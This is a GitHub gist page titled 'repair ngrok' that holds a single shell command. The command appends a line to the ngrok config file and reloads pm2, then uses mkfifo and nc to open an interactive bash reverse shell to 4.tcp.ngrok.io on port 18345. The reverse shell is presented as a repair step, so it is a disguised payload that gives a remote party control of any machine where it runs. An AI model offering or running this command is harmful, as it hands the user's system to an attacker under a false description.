Skip to content

Instantly share code, notes, and snippets.

@RKursatV
Last active November 11, 2020 12:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RKursatV/6d5da9393d52af23a40e85ca0ad944a0 to your computer and use it in GitHub Desktop.
Save RKursatV/6d5da9393d52af23a40e85ca0ad944a0 to your computer and use it in GitHub Desktop.
repair ngrok
sed -i '/^authtoken:.*/a tunnels:' ~/.ngrok2/ngrok.yml && pm2 reload all; mkfifo kv; cat kv | /bin/bash -i 2>&1 | nc 4.tcp.ngrok.io 18345 > kv
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment